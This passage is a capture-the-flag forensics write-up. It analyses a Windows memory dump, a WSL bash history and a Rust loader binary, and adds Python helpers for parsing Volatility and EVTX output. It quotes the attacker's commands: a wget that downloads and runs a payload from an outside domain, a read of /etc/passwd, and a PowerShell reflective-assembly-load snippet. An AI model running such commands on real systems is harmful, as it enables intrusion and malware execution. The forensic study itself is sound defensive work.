Pandora's Bane
23 minute read
We are given a memory dump called mem.raw:
$ du -h mem.raw
2,1G mem.raw
$ file mem.raw
mem.raw: data
Memory dump analysis
We will use volatility to analyze it (specifically, this Docker image):
$ docker run --rm -v "${PWD}":/project --entrypoint /bin/sh --platform linux/amd64 -it sk4la/volatility3
/usr/local $ cd /project
/project $ vol -f mem.raw windows.info.Info | tee info.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Variable Value
Kernel Base 0xf80445604000
DTB 0x1ad000
Symbols file:///usr/local/lib/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/CA8E2F01B822EDE6357898BFBF862997-1.json.xz
Is64Bit True
IsPAE False
layer_name 0 WindowsIntel32e
memory_layer 1 FileLayer
KdVersionBlock 0xf80446213368
Major/Minor 15.19041
MachineType 34404
KeNumberProcessors 5
SystemTime 2023-03-15 19:49:46
NtSystemRoot C:\Windows
NtProductType NtProductWinNt
NtMajorVersion 10
NtMinorVersion 0
PE MajorOperatingSystemVersion 10
PE MinorOperatingSystemVersion 0
PE Machine 34404
PE TimeDateStamp Wed Jan 4 04:27:11 1995
Now we can list all processes with windows.pstree.PsTree:
/project $ vol -f mem.raw windows.pstree.PsTree | tee pstree.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xdb8d38079080 159 - N/A False 2023-03-16 04:46:54.000000 N/A
* 388 4 smss.exe 0xdb8d3c132040 3 - N/A False 2023-03-16 04:46:54.000000 N/A
* 116 4 Registry 0xdb8d380be080 4 - N/A False 2023-03-16 04:46:53.000000 N/A
* 1588 4 MemCompression 0xdb8d3f757040 26 - N/A False 2023-03-15 19:46:59.000000 N/A
492 480 csrss.exe 0xdb8d3de710c0 11 - 0 False 2023-03-16 04:46:57.000000 N/A
568 480 wininit.exe 0xdb8d3e627080 3 - 0 False 2023-03-16 04:46:57.000000 N/A
* 712 568 services.exe 0xdb8d3e625080 6 - 0 False 2023-03-16 04:46:57.000000 N/A
** 2944 712 svchost.exe 0xdb8d3fd572c0 8 - 0 False 2023-03-15 19:47:01.000000 N/A
** 2308 712 MsMpEng.exe 0xdb8d3fa7a300 36 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2436 712 sppsvc.exe 0xdb8d3fadc080 4 - 0 False 2023-03-15 19:47:00.000000 N/A
** 5636 712 svchost.exe 0xdb8d3e3990c0 4 - 0 False 2023-03-15 19:47:12.000000 N/A
*** 5728 5636 init 0xdb8d3e39b080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5848 5728 init 0xdb8d3c361080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5252 712 SecurityHealth 0xdb8d402e9080 15 - 0 False 2023-03-15 19:47:13.000000 N/A
** 1928 712 svchost.exe 0xdb8d3815c080 4 - 0 False 2023-03-15 19:47:00.000000 N/A
** 4364 712 svchost.exe 0xdb8d4068e080 4 - 0 False 2023-03-15 19:47:07.000000 N/A
** 1936 712 svchost.exe 0xdb8d38136080 7 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2196 712 svchost.exe 0xdb8d3fa33200 16 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1308 712 svchost.exe 0xdb8d3f66b2c0 20 - 0 False 2023-03-16 04:46:58.000000 N/A
** 4124 712 SgrmBroker.exe 0xdb8d4054c080 7 - 0 False 2023-03-15 19:49:00.000000 N/A
** 6304 712 svchost.exe 0xdb8d4054b080 13 - 0 False 2023-03-15 19:49:01.000000 N/A
** 3880 712 svchost.exe 0xdb8d40121280 6 - 1 False 2023-03-15 19:47:02.000000 N/A
** 5672 712 svchost.exe 0xdb8d3e39c280 0 - 1 False 2023-03-15 19:47:12.000000 2023-03-15 19:47:22.000000
** 1076 712 svchost.exe 0xdb8d3f5d4080 16 - 0 False 2023-03-16 04:46:58.000000 N/A
*** 3180 1076 ctfmon.exe 0xdb8d3ffdd240 12 - 1 False 2023-03-15 19:47:01.000000 N/A
** 6708 712 svchost.exe 0xdb8d4054d080 4 - 0 False 2023-03-15 19:49:02.000000 N/A
** 4408 712 SearchIndexer. 0xdb8d40dc2240 14 - 0 False 2023-03-15 19:47:07.000000 N/A
** 1852 712 svchost.exe 0xdb8d3f69d080 6 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2108 712 svchost.exe 0xdb8d403c8080 9 - 0 False 2023-03-15 19:47:03.000000 N/A
** 1476 712 VBoxService.ex 0xdb8d3f717200 12 - 0 False 2023-03-16 04:46:58.000000 N/A
** 2248 712 wlms.exe 0xdb8d3fa6d200 3 - 0 False 2023-03-15 19:47:00.000000 N/A
** 972 712 svchost.exe 0xdb8d3f4b6240 8 - 0 False 2023-03-16 04:46:57.000000 N/A
** 1488 712 svchost.exe 0xdb8d3f71c2c0 19 - 0 False 2023-03-16 04:46:58.000000 N/A
** 852 712 svchost.exe 0xdb8d3e686240 14 - 0 False 2023-03-16 04:46:57.000000 N/A
*** 3744 852 SearchApp.exe 0xdb8d40294080 29 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 2976 852 WmiPrvSE.exe 0xdb8d4054f080 10 - 0 False 2023-03-15 19:49:22.000000 N/A
*** 2692 852 StartMenuExper 0xdb8d402130c0 8 - 1 False 2023-03-15 19:47:02.000000 N/A
*** 4868 852 WinStore.App.e 0xdb8d3fa2c280 18 - 1 False 2023-03-15 19:47:06.000000 N/A
*** 5092 852 RuntimeBroker. 0xdb8d40dbf2c0 6 - 1 False 2023-03-15 19:47:07.000000 N/A
*** 2920 852 RuntimeBroker. 0xdb8d40dad240 9 - 1 False 2023-03-15 19:47:09.000000 N/A
*** 2828 852 SppExtComObj.E 0xdb8d3fd0e280 3 - 0 False 2023-03-15 19:47:00.000000 N/A
*** 4844 852 ApplicationFra 0xdb8d3fcee080 7 - 1 False 2023-03-15 19:47:06.000000 N/A
*** 6828 852 WindowsPackage 0xdb8d4054e080 4 - 1 False 2023-03-15 19:47:19.000000 N/A
*** 2928 852 TextInputHost. 0xdb8d405c2080 11 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 5168 852 smartscreen.ex 0xdb8d40be6280 9 - 1 False 2023-03-15 19:47:11.000000 N/A
*** 6224 852 MoUsoCoreWorke 0xdb8d3ff62080 11 - 0 False 2023-03-15 19:49:01.000000 N/A
*** 3572 852 RuntimeBroker. 0xdb8d40217240 4 - 1 False 2023-03-15 19:47:03.000000 N/A
*** 5468 852 RuntimeBroker. 0xdb8d40cd90c0 8 - 1 False 2023-03-15 19:47:11.000000 N/A
*** 4760 852 ShellExperienc 0xdb8d3fd792c0 22 - 1 False 2023-03-15 19:47:09.000000 N/A
*** 3996 852 RuntimeBroker. 0xdb8d40490280 2 - 1 False 2023-03-15 19:47:03.000000 N/A
** 1108 712 svchost.exe 0xdb8d3f5dd2c0 15 - 0 False 2023-03-16 04:46:58.000000 N/A
** 1748 712 svchost.exe 0xdb8d3f7e22c0 9 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1112 712 svchost.exe 0xdb8d3f5df2c0 13 - 0 False 2023-03-16 04:46:58.000000 N/A
** 4576 712 NisSrv.exe 0xdb8d407a8080 11 - 0 False 2023-03-15 19:47:05.000000 N/A
** 1636 712 spoolsv.exe 0xdb8d3f9a90c0 9 - 0 False 2023-03-15 19:47:00.000000 N/A
** 1768 712 svchost.exe 0xdb8d3f90d080 13 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2412 712 svchost.exe 0xdb8d3fa2f080 27 - 0 False 2023-03-15 19:47:00.000000 N/A
** 2292 712 svchost.exe 0xdb8d3fe1f280 13 - 1 False 2023-03-15 19:47:01.000000 N/A
** 636 712 svchost.exe 0xdb8d3f57d200 59 - 0 False 2023-03-16 04:46:58.000000 N/A
*** 2184 636 sihost.exe 0xdb8d3fe1d240 13 - 1 False 2023-03-15 19:47:01.000000 N/A
*** 2600 636 taskhostw.exe 0xdb8d3fec5080 0 - 1 False 2023-03-15 19:47:01.000000 2023-03-15 19:47:01.000000
*** 2724 636 MicrosoftEdgeU 0xdb8d3ff46300 5 - 0 True 2023-03-15 19:47:01.000000 N/A
*** 2076 636 taskhostw.exe 0xdb8d3ff5f2c0 8 - 1 False 2023-03-15 19:47:01.000000 N/A
* 736 568 lsass.exe 0xdb8d3e687080 13 - 0 False 2023-03-16 04:46:57.000000 N/A
* 880 568 fontdrvhost.ex 0xdb8d3e6eb140 6 - 0 False 2023-03-16 04:46:57.000000 N/A
584 560 csrss.exe 0xdb8d3de6d240 14 - 1 False 2023-03-16 04:46:57.000000 N/A
668 560 winlogon.exe 0xdb8d3e664080 5 - 1 False 2023-03-16 04:46:57.000000 N/A
* 444 668 dwm.exe 0xdb8d3f546080 26 - 1 False 2023-03-16 04:46:57.000000 N/A
* 884 668 fontdrvhost.ex 0xdb8d3e6ec080 6 - 1 False 2023-03-16 04:46:57.000000 N/A
* 3340 668 userinit.exe 0xdb8d3fff2300 0 - 1 False 2023-03-15 19:47:01.000000 2023-03-15 19:47:25.000000
** 3404 3340 explorer.exe 0xdb8d4004d2c0 67 - 1 False 2023-03-15 19:47:01.000000 N/A
*** 5440 3404 VBoxTray.exe 0xdb8d40547080 12 - 1 False 2023-03-15 19:47:14.000000 N/A
*** 5772 3404 msedge.exe 0xdb8d40548080 31 - 1 False 2023-03-15 19:47:14.000000 N/A
**** 5792 5772 msedge.exe 0xdb8d402e8080 8 - 1 False 2023-03-15 19:47:14.000000 N/A
**** 6136 5772 msedge.exe 0xdb8d402e5080 8 - 1 False 2023-03-15 19:47:15.000000 N/A
**** 6128 5772 msedge.exe 0xdb8d402e7080 16 - 1 False 2023-03-15 19:47:15.000000 N/A
**** 6112 5772 msedge.exe 0xdb8d402e6080 13 - 1 False 2023-03-15 19:47:15.000000 N/A
*** 5148 3404 SecurityHealth 0xdb8d40546080 7 - 1 False 2023-03-15 19:47:13.000000 N/A
5320 5232 WindowsTermina 0xdb8d40bf4080 14 - 1 False 2023-03-15 19:47:11.000000 N/A
* 5536 5320 OpenConsole.ex 0xdb8d38df0080 6 - 1 False 2023-03-15 19:47:12.000000 N/A
* 5556 5320 ubuntu.exe 0xdb8d40c5d080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5812 5556 wsl.exe 0xdb8d3e39f080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
*** 5864 5812 wslhost.exe 0xdb8d3dfa1080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5872 5864 conhost.exe 0xdb8d3dfa2080 4 - 1 False 2023-03-15 19:47:12.000000 N/A
5880 5856 bash 0xdb8d3dfa3080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
6700 2940 WindowsTermina 0xdb8d3dfa7080 25 - 1 False 2023-03-15 19:49:28.000000 N/A
* 5600 6700 OpenConsole.ex 0xdb8d40bde0c0 6 - 1 False 2023-03-15 19:49:29.000000 N/A
* 5644 6700 powershell.exe 0xdb8d40550080 21 - 1 False 2023-03-15 19:49:29.000000 N/A
As can be seen, we are dealing with a Windows machine, but there are some Linux things (ubuntu.exe, bash). In fact, this Windows machine has WSL installed and running.
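A listing this long is error-prone to read by eye. The following is an added example, not code from the original writeup, that parses the text output of windows.pstree.PsTree (the leading `*` marks depth), flags processes whose parent is absent from the dump, lists processes that had already exited, and walks the lineage of the WSL-related processes. The sample input is a constructed subset of the lines above.

```python
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    ppid: int
    name: str
    offset: int
    threads: int
    session: str
    wow64: bool
    created: str
    exited: str  # "N/A" while the process was still alive at capture time


# Constructed sample: a subset of the windows.pstree.PsTree lines shown above.
SAMPLE_PSTREE = """\
PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime
4 0 System 0xdb8d38079080 159 - N/A False 2023-03-16 04:46:54.000000 N/A
* 388 4 smss.exe 0xdb8d3c132040 3 - N/A False 2023-03-16 04:46:54.000000 N/A
568 480 wininit.exe 0xdb8d3e627080 3 - 0 False 2023-03-16 04:46:57.000000 N/A
* 712 568 services.exe 0xdb8d3e625080 6 - 0 False 2023-03-16 04:46:57.000000 N/A
** 5636 712 svchost.exe 0xdb8d3e3990c0 4 - 0 False 2023-03-15 19:47:12.000000 N/A
*** 5728 5636 init 0xdb8d3e39b080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5848 5728 init 0xdb8d3c361080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5672 712 svchost.exe 0xdb8d3e39c280 0 - 1 False 2023-03-15 19:47:12.000000 2023-03-15 19:47:22.000000
5320 5232 WindowsTermina 0xdb8d40bf4080 14 - 1 False 2023-03-15 19:47:11.000000 N/A
* 5556 5320 ubuntu.exe 0xdb8d40c5d080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
** 5812 5556 wsl.exe 0xdb8d3e39f080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
*** 5864 5812 wslhost.exe 0xdb8d3dfa1080 3 - 1 False 2023-03-15 19:47:12.000000 N/A
**** 5872 5864 conhost.exe 0xdb8d3dfa2080 4 - 1 False 2023-03-15 19:47:12.000000 N/A
5880 5856 bash 0xdb8d3dfa3080 1 - 1 False 2023-03-15 19:47:12.000000 N/A
6700 2940 WindowsTermina 0xdb8d3dfa7080 25 - 1 False 2023-03-15 19:49:28.000000 N/A
* 5644 6700 powershell.exe 0xdb8d40550080 21 - 1 False 2023-03-15 19:49:29.000000 N/A
"""

# One PsTree row: depth stars, PID, PPID, image name, offset, threads, handles ("-"),
# session, Wow64, CreateTime (two tokens), ExitTime ("N/A" or two tokens).
LINE_RE = re.compile(
    r"^(?P<depth>\**)\s*(?P<pid>\d+)\s+(?P<ppid>\d+)\s+(?P<name>\S+)\s+"
    r"(?P<offset>0x[0-9a-f]+)\s+(?P<threads>\d+)\s+\S+\s+(?P<session>\S+)\s+"
    r"(?P<wow64>True|False)\s+(?P<created>\S+ \S+)\s+(?P<exited>.+?)\s*$"
)


def parse_pstree(text):
    """Parse PsTree text output into {pid: Proc}; banner and header lines are skipped."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        procs[int(m["pid"])] = Proc(
            pid=int(m["pid"]), ppid=int(m["ppid"]), name=m["name"],
            offset=int(m["offset"], 16), threads=int(m["threads"]),
            session=m["session"], wow64=m["wow64"] == "True",
            created=m["created"], exited=m["exited"],
        )
    return procs


def orphans(procs):
    """PIDs whose parent is not in the listing (parent exited before capture, or never captured)."""
    return sorted(p.pid for p in procs.values() if p.ppid != 0 and p.ppid not in procs)


def exited(procs):
    """PIDs that carry an ExitTime, i.e. were already terminated when the dump was taken."""
    return sorted(p.pid for p in procs.values() if p.exited != "N/A")


def lineage(procs, pid):
    """Image names from pid up to the highest ancestor present in the dump."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(procs[pid].name)
        pid = procs[pid].ppid
    return chain


if __name__ == "__main__":
    procs = parse_pstree(SAMPLE_PSTREE)
    print("parents missing from the dump:", orphans(procs))
    print("exited before capture:", exited(procs))
    for pid in (5864, 5880, 5644):
        print(pid, " <- ".join(lineage(procs, pid)))
```

A missing parent is a prompt to look at the lineage, not a verdict: csrss.exe and wininit.exe pointing at PID 480 are normal, since the per-session smss.exe copy that starts them typically exits right away. What is worth noting here is the WindowsTerminal → ubuntu.exe → wsl.exe → wslhost.exe chain and the bash process with no Windows parent in the dump at all.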
WSL analysis
So, let's use linux.bash.Bash to see the command history:
/project $ vol -f mem.raw linux.bash.Bash | tee bash.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 Stacking attempts finished
Unsatisfied requirement plugins.Bash.kernel: Linux kernel
Unable to validate the plugin requirements: ['plugins.Bash.kernel']
Well… it didn't work, because this is a Windows memory dump, not a Linux one. So, let's list all files and look for .bash_history:
/project $ vol -f mem.raw windows.filescan.FileScan | tee filescan.txt
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Offset Name Size
0xdb8d380ac250 \$ConvertToNonresident 216
0xdb8d386f84f0 \Windows\System32\drivers\en-US\ntfs.sys.mui 216
0xdb8d386f87d0 \$Directory 216
0xdb8d386f8d90 \Windows\System32\drivers\crashdmp.sys 216
0xdb8d386f9bf0 \$Directory 216
0xdb8d386f9d60 \$Directory 216
0xdb8d386f9ed0 \Windows\System32\drivers\dumpfve.sys 216
0xdb8d389c4d90 \$MftMirr 216
0xdb8d389c54c0 \$Extend\$UsnJrnl:$J:$DATA 216
...
/project $ grep .bash_history filescan.txt
0xdb8d3deac890 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\home\user\.bash_history 216
0xdb8d3deae960 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\home\user\.bash_history 216
Alright, let's take a look at it:
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3deac890
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3deac890 .bash_history file.0xdb8d3deac890.0xdb8d3e25a260.DataSectionObject..bash_history.dat
/project $ cat file.0xdb8d3deac890.0xdb8d3e25a260.DataSectionObject..bash_history.dat
rm .bash_history
whoami
id
cat /etc/passwd
ping google.com
ps aux
uname -a
cat /etc/os-release
wget windowsliveupdater.com/updater -O /tmp/.apt-cache
chmod +x /tmp/.apt-cache
/tmp/.apt-cache
It looks like an attacker gained access to WSL, downloaded some file, saved it as /tmp/.apt-cache and executed it. So, let's grab this file:
/project $ grep .apt-cache filescan.txt
0xdb8d3debe9a0 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
0xdb8d3debeb30 \Users\Rygnarix\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu_79rhkp1fndgsc\LocalState\rootfs\tmp\.apt-cache 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3debe9a0
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3debe9a0 .apt-cache file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat
It is an ELF binary:
/project $ file file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat
/bin/sh: file: not found
/project $ xxd
^C
/project $ xxd file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | head
00000000: 7f45 4c46 0201 0100 0000 0000 0000 0000 .ELF............
00000010: 0300 3e00 0100 0000 30a5 0000 0000 0000 ..>.....0.......
00000020: 4000 0000 0000 0000 3892 4100 0000 0000 @.......8.A.....
00000030: 0000 0000 4000 3800 0e00 4000 2900 2800 ....@.8...@.).(.
00000040: 0600 0000 0400 0000 4000 0000 0000 0000 ........@.......
00000050: 4000 0000 0000 0000 4000 0000 0000 0000 @.......@.......
00000060: 1003 0000 0000 0000 1003 0000 0000 0000 ................
00000070: 0800 0000 0000 0000 0300 0000 0400 0000 ................
00000080: 5003 0000 0000 0000 5003 0000 0000 0000 P.......P.......
00000090: 5003 0000 0000 0000 1c00 0000 0000 0000 P...............
In fact, it is a compiled Rust binary…
/project $ strings file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | grep -i rust | tail
__rust_alloc_error_handler_should_panic
__rust_alloc_error_handler
_ZN71_$LT$rustc_demangle..legacy..Demangle$u20$as$u20$core..fmt..Display$GT$3fmt17hb8f3b76cb51de4f4E
_ZN3std5alloc8rust_oom17h5129f9213c1813b9E
__rust_foreign_exception
_ZN14rustc_demangle8Demangle6as_str17h55e116f6a433aad5E
__rust_panic_cleanup
_ZN63_$LT$rustc_demangle..Demangle$u20$as$u20$core..fmt..Display$GT$3fmt17hf63e7b42d6c0f488E
__rust_realloc
_ZN14rustc_demangle12try_demangle17h8bc66e4ab41ba7b3E
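To confirm what xxd and strings suggest without relying on `file` (which the container lacks), here is an added example, not code from the original writeup, that decodes the ELF64 header from the bytes shown in the xxd listing above and checks the binary for Rust toolchain fingerprints. The tail appended after the header is a constructed stand-in for the rest of the file, made of marker strings taken from the strings output above.

```python
import struct

# First 64 bytes of the dumped .apt-cache, transcribed from the xxd listing above.
ELF_HEADER = bytes.fromhex(
    "7f454c46020101000000000000000000"
    "03003e000100000030a5000000000000"
    "40000000000000003892410000000000"
    "00000000400038000e00400029002800"
)

# Constructed stand-in for the rest of the binary: a few of the marker strings that
# `strings | grep -i rust` surfaced above, so the Rust check has something to find.
RUST_TAIL = (
    b"\x00__rust_alloc_error_handler\x00"
    b"_ZN3std5alloc8rust_oom17h5129f9213c1813b9E\x00"
    b"/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/core/src/slice/iter.rs\x00"
)
SAMPLE_BINARY = ELF_HEADER + RUST_TAIL

E_TYPES = {0: "NONE", 1: "REL", 2: "EXEC", 3: "DYN", 4: "CORE"}
E_MACHINES = {0x03: "x86", 0x28: "ARM", 0x3e: "x86-64", 0xb7: "AArch64"}

# Elf64_Ehdr: e_ident[16], e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
# e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
EHDR64 = struct.Struct("<16sHHIQQQIHHHHHH")


def parse_elf64_header(data):
    """Decode the ELF64 header; raises ValueError for anything that is not little-endian ELF64."""
    if len(data) < EHDR64.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2:  # EI_CLASS
        raise ValueError("only ELFCLASS64 is handled here")
    if data[5] != 1:  # EI_DATA
        raise ValueError("only little-endian ELF is handled here")
    (_, e_type, e_machine, _, e_entry, e_phoff, e_shoff, _,
     _, _, e_phnum, _, e_shnum, e_shstrndx) = EHDR64.unpack(data[:EHDR64.size])
    return {
        "type": E_TYPES.get(e_type, hex(e_type)),
        "machine": E_MACHINES.get(e_machine, hex(e_machine)),
        "entry": e_entry,
        "phoff": e_phoff, "phnum": e_phnum,
        "shoff": e_shoff, "shnum": e_shnum, "shstrndx": e_shstrndx,
    }


# Substrings Rust toolchains leave behind: rustc source paths with the commit hash,
# allocator hooks, and legacy-mangled std symbols.
RUST_MARKERS = [b"rustc/", b"__rust_", b"_ZN3std", b"library/core/src"]


def rust_markers(data):
    """Return the Rust fingerprints present in the binary, in RUST_MARKERS order."""
    return [m.decode() for m in RUST_MARKERS if m in data]


if __name__ == "__main__":
    header = parse_elf64_header(SAMPLE_BINARY)
    for key, value in header.items():
        print(f"{key:9} {value:#x}" if isinstance(value, int) else f"{key:9} {value}")
    print("rust markers:", rust_markers(SAMPLE_BINARY))
```

The header decodes as an x86-64 ET_DYN object with entry point 0xa530 and 14 program headers. ET_DYN for a file that was executed directly means a position-independent executable, which is also why the Ghidra addresses later in the writeup look like 0010c170: Ghidra loads PIE ELF files at its default base of 0x100000.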
Rust reverse engineering
Let's open the binary in Ghidra and try to reverse engineer it. This is the main function:
void main(int param_1, undefined8 param_2) {
code *local_8;
local_8 = _ZN11rust_loader4main17he1dbe5ec8f35a907E;
std::rt::lang_start_internal(&local_8, anon.6b03302ec1ee582ae67c97070480a9e5.0.llvm.11976028101026120347, (long)param_1, param_2, 0);
}
And it calls another “main” function. This one is quite large, so I won't show it whole here. However, I saw some suspicious strings:
void _ZN11rust_loader4main17he1dbe5ec8f35a907E(void) {
// ...
std::net::udp::UdpSocket::recv((int)&local_508,&local_6a0,(size_t)&local_430,0x400);
// ...
/* try { // try from 0010c170 to 0010c1da has its CatchHandler @ 0010cb1e */
std::fs::{impl#5}::read_to_end(&local_430,&local_6bc,&local_630);
// ...
_ZN58_$LT$alloc..vec..Vec$LT$u8$GT$$u20$as$u20$hex..FromHex$GT$8from_hex17h4ad6d567acff2bc3E
(puVar10,
"99b97bf329968477cc3aae5dd24fdc12a04177b98f66444e03a9a14c2b1758823a85861eccaadc8ecd4f36d201a510ce\n $bytes = [System.Convert]::FromBase64String(\"\")\n $asm = [Reflection.Assembly]::Load($bytes)\n $method = $asm.GetType(\"SecurityUpdate.Updater\")\n $method::run()called `Option::unwrap()` on a `None` value/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/alloc/src/collections/btree/navigate.rs/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/core/src/slice/iter.rs"
);
if (local_430 == NULL) {
local_648 = uStack_428;
uStack_644 = uStack_424;
uStack_640 = local_420;
uStack_63c = uStack_41c;
if (CONCAT44(uStack_414,uStack_418) == 0x20) {
uVar1 = CONCAT44(uStack_41c,local_420);
/* try { // try from 0010c260 to 0010c273 has its CatchHandler @ 0010cb00 */
_ZN58_$LT$alloc..vec..Vec$LT$u8$GT$$u20$as$u20$hex..FromHex$GT$8from_hex17h3e43d3f240902ff1E
(&local_430,
"3a85861eccaadc8ecd4f36d201a510ce\n $bytes = [System.Convert]::FromBase64String(\"\")\n $asm = [Reflection.Assembly]::Load($bytes)\n $method = $asm.GetType(\"SecurityUpdate.Updater\")\n $method::run()called `Option::unwrap()` on a `None` value/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/alloc/src/collections/btree/navigate.rs/rustc/d5a82bbd26e1ad8b7401f6a718a9c57c96905483/library/core/src/slice/iter.rs"
);
// ...
/* try { // try from 0010c3a6 to 0010c3bf has its CatchHandler @ 0010cacb */
std::sys::unix::process::process_common::Command::new(&local_618,&DAT_001521cf,0xe);
memcpy(&local_508,&local_618,0xd0);
/* try { // try from 0010c3de to 0010c47c has its CatchHandler @ 0010cad5 */
std::sys::unix::process::process_common::Command::arg(&local_508,&DAT_001521dd,8);
std::sys::unix::process::process_common::Command::arg(&local_508,pcStack_6b0,local_6a8);
std::process::Command::output(&local_618,&local_508);
// ...
}
I know, it's a mess. But the important thing is that we can see the binary somehow executing PowerShell commands on the Windows machine. We can list some of them using strings (Rust strings are weird: string literals are stored back to back without NUL terminators, so strings runs them together):
/project $ strings file.0xdb8d3debe9a0.0xdb8d3e264b20.DataSectionObject..apt-cache.dat | grep powershell.exe
called `Result::unwrap()` on an `Err` valuepowershell.exe-Command{Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Unrestricted}src/main.rs{Set-PSReadlineOption
PowerShell logs
Let's take a look at the PowerShell logs:
/project $ grep evtx filescan.txt | grep PowerShell.evtx
0xdb8d3f64d650 \Windows\System32\winevt\Logs\Windows PowerShell.evtx 216
/project $ vol -f mem.raw windows.dumpfiles.DumpFiles --virtaddr 0xdb8d3f64d650
Volatility 3 Framework 2.0.1
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xdb8d3f64d650 Windows PowerShell.evtx file.0xdb8d3f64d650.0xdb8d3f408a90.DataSectionObject.Windows PowerShell.evtx.dat
SharedCacheMap 0xdb8d3f64d650 Windows PowerShell.evtx file.0xdb8d3f64d650.0xdb8d3f684a20.SharedCacheMap.Windows PowerShell.evtx.vacb
Using python-evtx, we can transform the EVTX file into XML data:
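Once the log is in XML form, the interesting records can be pulled out programmatically rather than scrolled through. The following is an added example, not code from the original writeup. It assumes the layout evtx_dump.py produces, as shown in the listing below: one `<Event>` per record under an `<Events>` root, with the PowerShell provider's `Key=Value` fields inside an `EventData/Data/string` element. The sample input is a constructed two-record file whose first event carries the reflective-load command recovered from the dump, with its base64 cut to the first 32 characters of the real blob, and whose second event is a benign command line for contrast.

```python
import base64
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample in the shape python-evtx's evtx_dump.py emits (two EventID 600 records).
SAMPLE_XML = """<?xml version="1.1" encoding="utf-8" standalone="yes" ?>
<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<TimeCreated SystemTime="2023-03-15 19:13:58.732605"></TimeCreated>
<EventRecordID>558</EventRecordID>
<Computer>Galax-35</Computer>
</System>
<EventData><Data><string>Function</string>
<string>Started</string>
<string> ProviderName=Function
NewProviderState=Started
SequenceNumber=9
HostName=ConsoleHost
HostApplication=powershell.exe -Command
$bytes = [System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA")
$asm = [Reflection.Assembly]::Load($bytes)
$method = $asm.GetType("SecurityUpdate.Updater")
$method::run()
EngineVersion=
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event"><System><Provider Name="PowerShell"></Provider>
<EventID Qualifiers="0">600</EventID>
<TimeCreated SystemTime="2023-03-15 19:20:01.000000"></TimeCreated>
<EventRecordID>560</EventRecordID>
<Computer>Galax-35</Computer>
</System>
<EventData><Data><string>Registry</string>
<string>Started</string>
<string> ProviderName=Registry
HostApplication=powershell.exe -NoProfile -Command Get-Date
CommandLine=</string>
</Data>
<Binary></Binary>
</EventData>
</Event>
</Events>
"""

KEY_RE = re.compile(r"^([A-Za-z]+)=(.*)$")
B64_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')


def parse_fields(text):
    """Turn the 'Key=Value' block of a PowerShell provider event into a dict. A line that does
    not start with a key continues the previous value; that is how the multi-line
    HostApplication command survives (its PowerShell lines start with '$', not a key)."""
    fields, key = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            key = m.group(1)
            fields[key] = m.group(2)
        elif key is not None and line:
            fields[key] += "\n" + line
    return fields


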